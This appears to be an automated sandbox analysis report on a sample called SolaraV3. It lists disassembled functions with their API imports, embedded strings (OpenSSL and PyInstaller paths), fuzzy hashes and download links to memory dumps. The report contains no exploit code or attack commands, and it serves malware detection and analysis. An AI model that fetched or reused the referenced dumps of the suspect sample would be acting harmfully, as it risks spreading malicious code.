Opcode Fuzzy Hash: bae10787738cc56e37b62d3b1ee36bf99efdbc286f7b95d1d095db50d282c8fb
Instruction Fuzzy Hash: 23C178F2A2868282FB559A36D858FF963A1EF84B84F044135DE0D4B789CF3DE545C744

Function 00007FF6DC715FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC715FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC716106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7161BC

Strings

verbose, xrefs: 00007FF6DC715FB0

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: acca1cefd9955db0fb23f69d374c24db7b22b3884288c6a271468267b466f64d
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 7C91D072A08A4A85F7618EACD4607BD37A5FB40BA4F44A137DA5D833D6DE3CE4279300

Function 00007FF6DC71FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71FEA7

Part of subcall function 00007FF6DC717A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC717A59

Strings

ccs, xrefs: 00007FF6DC71FDE2
UTF-16LEUNICODE, xrefs: 00007FF6DC71FE45
UTF-8, xrefs: 00007FF6DC71FE26

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 15847c40128809faf47aee091a7e908b096008143f76c1c92c40a1cbc4d07e5f
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: 9181D172E1C64B85F7649F2D813227C36A0AB11B88F55A037EA49D72D5CF2CE9279301

Function 00007FF6DC70D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6DC70D673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6DC70D70A
RtlUnwindEx.KERNEL32 ref: 00007FF6DC70D764

Strings

csm, xrefs: 00007FF6DC70D6F1

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: 2bf336eb9efcc45af238ce5be99ebec237e132ad660c3322bdd9308f1f0f4caa
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: DB519332A1970A8ADB14CB26E44467C73A1FB54B98F504136FA4D87784EF7EE862D700

Function 00007FF6DC70EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6DC70EF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6DC70EF83

Strings

MOC, xrefs: 00007FF6DC70EF4B
RCC, xrefs: 00007FF6DC70EF53

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: 3642e66e2c657ee63a75e3045ced45d3b170a8ac51a78ca35b94e54253fc2eca
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: 35617232908BC985D7609B16E4403AEB7A0FB857D4F044226EBDC87B56DF7DE1A1CB00

Function 00007FF6DC70F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6DC70F2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6DC70F398

Strings

csm, xrefs: 00007FF6DC70F2D2
csm, xrefs: 00007FF6DC70F3EA

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 571916d6c6b2b251612df15d85af1462785746471ce510bc39ed9345e676af98
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: 12518E72A0834A86EB648A23904436C77B0FB55B94F14413BFA9DC7B85CF3DE462D705

Function 00007FFB0B812838 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

..\s\crypto\async\async.c, xrefs: 00007FFB0B8D317F, 00007FFB0B8D31CD, 00007FFB0B8D31E6, 00007FFB0B8D321C, 00007FFB0B8D3266, 00007FFB0B8D32BC, 00007FFB0B8D32DD, 00007FFB0B8D32FB, 00007FFB0B8D3335, 00007FFB0B8D335A
T, xrefs: 00007FFB0B8D32F3

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID:
String ID: ..\s\crypto\async\async.c$T
API String ID: 0-2182492907
Opcode ID: d4c81dbd977d12fa69bd9a3abb1c4e90a5e36bc3b63dafdfdd5457bbed4ac51f
Instruction ID: f785fc8c28cc1ab164dc9aa3f5f2c378419101e410f027f37f6bcfe723bd6d73
Opcode Fuzzy Hash: d4c81dbd977d12fa69bd9a3abb1c4e90a5e36bc3b63dafdfdd5457bbed4ac51f
Instruction Fuzzy Hash: 74518BB1A09B4386EB209F31E400EB96764EF84B80F449435DA4F87BB5DF3DE5498B14

Function 00007FFB0B8D6E10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129networkCOMMON

Download Yara Rule

APIs

getnameinfo.WS2_32 ref: 00007FFB0B8D6EAB
htons.WS2_32 ref: 00007FFB0B8D6F1B

Strings

..\s\crypto\bio\b_addr.c, xrefs: 00007FFB0B8D6EC4, 00007FFB0B8D6F46, 00007FFB0B8D6F65, 00007FFB0B8D6F95, 00007FFB0B8D6FB2, 00007FFB0B8D6FD4
, xrefs: 00007FFB0B8D6E91

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: getnameinfohtons
String ID: $..\s\crypto\bio\b_addr.c
API String ID: 1503050688-1606403076
Opcode ID: af598f06c0245db41dead80509d3e431c698856c8df4789aecb38cc2124cad97
Instruction ID: 7f2c3f6ee71b416c07f7d7cb66300d122ea6c2377aad5bb55d2fe877c7e1c85a
Opcode Fuzzy Hash: af598f06c0245db41dead80509d3e431c698856c8df4789aecb38cc2124cad97
Instruction Fuzzy Hash: 6E51A0A2A19B4686FB209F31E001EB97364EB44744F44C436EB8E876B5EF3DE9858710

Function 00007FFB0B813846 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON

Download Yara Rule

Strings

J, xrefs: 00007FFB0B8D9D55
..\s\crypto\bio\b_sock.c, xrefs: 00007FFB0B8D9CDA, 00007FFB0B8D9D5D
host=, xrefs: 00007FFB0B8D9DCE

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID:
String ID: ..\s\crypto\bio\b_sock.c$J$host=
API String ID: 0-1729655730
Opcode ID: fb7855fcd371f05ee0f8c06c4a9d3ff59d339786e254bf31641fa772ec444ff7
Instruction ID: 64462e7cb20229aeeb13f5984b8f0d19cc4e04f61015ddad1774b799b132111b
Opcode Fuzzy Hash: fb7855fcd371f05ee0f8c06c4a9d3ff59d339786e254bf31641fa772ec444ff7
Instruction Fuzzy Hash: 7531A1A2B0864282EB10DB65E441DAEA364FB84790F444435EB8EC7BBADF3DD5458B04

Function 00007FF6DC707E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF6DC70352C,?,00000000,00007FF6DC703F1B), ref: 00007FF6DC707F32

Strings

%s%c, xrefs: 00007FF6DC707EA4
%.*s, xrefs: 00007FF6DC707EEB
\, xrefs: 00007FF6DC707E97

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction ID: 6159a3fe0909b507218d4bb37585b52417ebddbb817d84b32bed9a8ce47fd634
Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction Fuzzy Hash: 5431E821719AC945EA218B22E4103AE6364EF84BE0F540232FE6D877C9DF3CD657CB00

Function 00007FF6DC702810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6DC7028EA

Strings

ERROR, xrefs: 00007FF6DC70286F
Error, xrefs: 00007FF6DC7028DD
[PYI-%d:%ls] , xrefs: 00007FF6DC702868

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: ac48b7fb5083cbf064f8585c0f2e134070770dd78a8aba58462d55460d0510f4
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: 9B21AE72B08B4586E7219B15F8957EE63A4FB88780F404136EA8D9365ADE3CE266C740

Function 00007FFB0B811C7B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB0B9C7B6A

Strings

DH PARAMETERS, xrefs: 00007FFB0B9C7B1B
X9.42 DH PARAMETERS, xrefs: 00007FFB0B9C7B59
..\s\crypto\pem\pem_pkey.c, xrefs: 00007FFB0B9C7B94, 00007FFB0B9C7BB9, 00007FFB0B9C7BD0

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: 00007B5630
String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
API String ID: 2248877218-3633731555
Opcode ID: f7c8cefcc52172e22eb95b664cdde1b2570e3c7e5a17e47a6528b570642fd444
Instruction ID: bb2f252c509fe09fb7441d92f05c7791f7c08225c767a6c46069bd128fadc1f6
Opcode Fuzzy Hash: f7c8cefcc52172e22eb95b664cdde1b2570e3c7e5a17e47a6528b570642fd444
Instruction Fuzzy Hash: 7B2177A1609746C1EA10DBB5E4409AAB3A4FF847D4F44C436EA4E87B75EF7DE544CB00

Function 00007FFB0B81139D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFB0B8DAB10
WSAGetLastError.WS2_32 ref: 00007FFB0B8DAB1B

Strings

2, xrefs: 00007FFB0B8DAB45
..\s\crypto\bio\b_sock2.c, xrefs: 00007FFB0B8DAB31, 00007FFB0B8DAB4D

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: ErrorLastsocket
String ID: ..\s\crypto\bio\b_sock2.c$2
API String ID: 1120909799-2051290508
Opcode ID: e6e0678db33773633ffedb91ac649e33e06e4e0a3b3b72e71866550694f6694c
Instruction ID: beafdc6670f1654feba72e637a9a33e713b67fcd6e7ea84aabd733cf354cba77
Opcode Fuzzy Hash: e6e0678db33773633ffedb91ac649e33e06e4e0a3b3b72e71866550694f6694c
Instruction Fuzzy Hash: 1301A1B1A0864283E3109B31E401EAD6328FB44754F648635E76E87AF5CF3DE9018B40

Function 00007FF6DC71C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6DC71C61F
WriteFile.KERNEL32 ref: 00007FF6DC71C8E7
WriteFile.KERNEL32 ref: 00007FF6DC71C92D
GetLastError.KERNEL32 ref: 00007FF6DC71C9E3

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: 3e07541550a7beac845259cbbb19ef6864434d5710c9611dbbcc26be15ba6914
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 99D11772B18A8589EB11CFB9D4502AC3BB1FB54798B445236DE5ED7B89DE38D027C700

Function 00007FF6DC71CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

